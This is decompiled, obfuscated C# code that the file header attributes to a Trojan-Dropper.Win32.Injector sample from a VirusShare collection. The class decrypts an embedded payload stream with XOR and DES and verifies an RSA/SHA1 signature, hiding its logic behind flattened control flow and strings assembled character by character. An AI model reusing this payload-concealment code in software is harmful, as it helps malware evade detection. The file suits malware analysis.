// Decompiled with JetBrains decompiler // Type:  // Assembly: Feon, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: AF8034ED-5A2C-4122-9E1B-F560737FA983 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Dropper.Win32.Injector.exwr-69a114df5525bb71f18484f15cb4dd44f7c416f26c41b8af17d2ce1b2774383e.exe using System; using System.IO; using System.Reflection; using System.Security.Cryptography; internal sealed class \uE011 { private const int \uE000 = 8; private const int \uE001 = 20; private const int \uE002 = 4; private static byte[] \uE003 = new byte[4]; private static byte[] \uE004; static \uE011() { label_2: int num = 0; while (true) { switch (num) { case 0: \uE011.\uE004 = new byte[4]; num = 4; continue; case 1: \uE011.\uE003[1] = \uE011.\uE004[1] = (byte) 83; num = 3; continue; case 2: \uE011.\uE004[3] = (byte) 50; num = 6; continue; case 3: \uE011.\uE003[2] = \uE011.\uE004[2] = (byte) 65; num = 5; continue; case 4: \uE011.\uE003[0] = \uE011.\uE004[0] = (byte) 82; num = 1; continue; case 5: \uE011.\uE003[3] = (byte) 49; num = 2; continue; case 6: goto label_9; default: goto label_2; } } label_9:; } public static MemoryStream \uE000(Stream _param0) { BinaryReader binaryReader1 = new BinaryReader(_param0); DESCryptoServiceProvider cryptoServiceProvider1 = new DESCryptoServiceProvider(); bool flag1 = binaryReader1.ReadBoolean(); int count1 = (int) binaryReader1.ReadUInt16(); byte[] buffer1 = new byte[count1]; binaryReader1.Read(buffer1, 0, count1); if ((!flag1 ? 1 : 0) == 0) { byte[] buffer2 = new byte[8]; binaryReader1.Read(buffer2, 0, 8); for (int index = 0; index < count1; ++index) buffer1[index] = (byte) ((uint) buffer1[index] ^ (uint) buffer2[index % 8]); } BinaryReader binaryReader2 = new BinaryReader((Stream) new MemoryStream(buffer1, false)); label_6: int num = 7; int count2; int count3; bool flag2; byte[] numArray; byte[] buffer3; bool flag3; while (true) { switch (num) { case 0: count2 = (int) binaryReader2.ReadByte(); num = 3; continue; case 1: count3 = (int) binaryReader2.ReadByte(); num = 8; continue; case 2: flag2 = binaryReader2.ReadBoolean(); num = 0; continue; case 3: numArray = new byte[count2]; num = 4; continue; case 4: if (flag2) { num = 10; continue; } goto label_19; case 5: binaryReader2.Read(buffer3, 0, count3); num = 6; continue; case 6: cryptoServiceProvider1.IV = buffer3; num = 2; continue; case 7: binaryReader2.ReadString(); num = 9; continue; case 8: buffer3 = new byte[count3]; num = 5; continue; case 9: flag3 = binaryReader2.ReadBoolean(); num = 1; continue; case 10: goto label_18; default: goto label_6; } } label_18: binaryReader2.Read(numArray, 0, count2); label_19: RSACryptoServiceProvider cryptoServiceProvider2 = (RSACryptoServiceProvider) null; int count4 = binaryReader2.ReadInt32(); byte[] buffer4 = new byte[count4]; binaryReader2.Read(buffer4, 0, count4); if (!flag2) { byte[] publicKey = Assembly.GetExecutingAssembly().GetName().GetPublicKey(); if (publicKey == null || publicKey.Length != 160) throw new InvalidOperationException(); Buffer.BlockCopy((Array) publicKey, 12, (Array) numArray, 0, count2); numArray[5] |= (byte) 128; cryptoServiceProvider2 = new RSACryptoServiceProvider(); cryptoServiceProvider2.ImportParameters(\uE011.\uE003(publicKey)); } cryptoServiceProvider1.Key = numArray; MemoryStream memoryStream = new MemoryStream(); using (CryptoStream cryptoStream = new CryptoStream(binaryReader1.BaseStream, cryptoServiceProvider1.CreateDecryptor(), CryptoStreamMode.Read)) { if (flag3) \uE00F.\uE000((Stream) cryptoStream, (Stream) memoryStream); else \uE011.\uE002((Stream) cryptoStream, (Stream) memoryStream); } if (cryptoServiceProvider2 != null) { memoryStream.Position = 0L; if (!\uE011.\uE005(cryptoServiceProvider2, (Stream) memoryStream, buffer4)) throw new InvalidOperationException(); } memoryStream.Position = 0L; return memoryStream; } private static byte[] \uE001(byte[] _param0, int _param1, int _param2) { if ((_param0 == null ? 1 : 0) == 0) { label_2: int num = 0; while (true) { switch (num) { case 0: if (_param0.Length < _param1 + _param2) { num = 1; continue; } goto label_6; case 1: goto label_5; default: goto label_2; } } label_6: byte[] destinationArray = new byte[_param2]; Array.Copy((Array) _param0, _param1, (Array) destinationArray, 0, _param2); return destinationArray; } label_5: return (byte[]) null; } private static void \uE002(Stream _param0, Stream _param1) { byte[] buffer = new byte[4096]; while (true) { int count = _param0.Read(buffer, 0, buffer.Length); if ((count <= 0 ? 0 : 1) != 0) _param1.Write(buffer, 0, count); else break; } } private static RSAParameters \uE003(byte[] _param0) { bool flag = _param0.Length == 160; if ((!flag ? 1 : 0) == 0 && !\uE011.\uE004(_param0, \uE011.\uE003, 20)) return new RSAParameters(); if (!flag && !\uE011.\uE004(_param0, \uE011.\uE004, 8)) return new RSAParameters(); RSAParameters rsaParameters = new RSAParameters(); int num1 = (flag ? 20 : 8) + 8; int num2 = 4; rsaParameters.Exponent = \uE011.\uE001(_param0, num1, num2); Array.Reverse((Array) rsaParameters.Exponent); int num3 = num1 + num2; int num4 = 128; rsaParameters.Modulus = \uE011.\uE001(_param0, num3, num4); Array.Reverse((Array) rsaParameters.Modulus); if (flag) return rsaParameters; int num5 = num3 + num4; label_8: int num6 = 14; while (true) { switch (num6) { case 0: rsaParameters.P = \uE011.\uE001(_param0, num5, num4); num6 = 12; continue; case 1: rsaParameters.DQ = \uE011.\uE001(_param0, num5, num4); num6 = 6; continue; case 2: num5 += num4; num6 = 15; continue; case 3: rsaParameters.D = \uE011.\uE001(_param0, num5, num4); num6 = 10; continue; case 4: num5 += num4; num6 = 7; continue; case 5: rsaParameters.InverseQ = \uE011.\uE001(_param0, num5, num4); num6 = 9; continue; case 6: Array.Reverse((Array) rsaParameters.DQ); num6 = 2; continue; case 7: num4 = 64; num6 = 1; continue; case 8: num4 = 64; num6 = 17; continue; case 9: Array.Reverse((Array) rsaParameters.InverseQ); num6 = 13; continue; case 10: Array.Reverse((Array) rsaParameters.D); num6 = 23; continue; case 11: Array.Reverse((Array) rsaParameters.DP); num6 = 4; continue; case 12: Array.Reverse((Array) rsaParameters.P); num6 = 16; continue; case 13: num5 += num4; num6 = 19; continue; case 14: num4 = 64; num6 = 0; continue; case 15: num4 = 64; num6 = 5; continue; case 16: num5 += num4; num6 = 21; continue; case 17: rsaParameters.DP = \uE011.\uE001(_param0, num5, num4); num6 = 11; continue; case 18: rsaParameters.Q = \uE011.\uE001(_param0, num5, num4); num6 = 20; continue; case 19: num4 = 128; num6 = 3; continue; case 20: Array.Reverse((Array) rsaParameters.Q); num6 = 22; continue; case 21: num4 = 64; num6 = 18; continue; case 22: num5 += num4; num6 = 8; continue; case 23: goto label_32; default: goto label_8; } } label_32: return rsaParameters; } private static bool \uE004(byte[] _param0, byte[] _param1, int _param2) { int index = 0; if ((index == 0 ? 1 : 0) != 0) goto label_7; else goto label_2; label_1: int num; switch (num) { case 0: goto label_3; case 1: return false; } label_2: num = 0; goto label_1; label_3: if ((int) _param0[index + _param2] != (int) _param1[index]) { num = 1; goto label_1; } else ++index; label_7: if (index >= _param1.Length) return true; goto label_3; } private static bool \uE005(RSACryptoServiceProvider _param0, Stream _param1, byte[] _param2) { SHA1CryptoServiceProvider cryptoServiceProvider = new SHA1CryptoServiceProvider(); label_2: int num = 0; byte[] hash; string name; while (true) { switch (num) { case 0: hash = cryptoServiceProvider.ComputeHash(_param1); num = 3; continue; case 1: name += (string) (object) 'A'; num = 4; continue; case 2: name += (string) (object) 'H'; num = 1; continue; case 3: name = new string('S', 1); num = 2; continue; case 4: name += (string) (object) '1'; num = 5; continue; case 5: goto label_8; default: goto label_2; } } label_8: return _param0.VerifyHash(hash, CryptoConfig.MapNameToOID(name), _param2); } }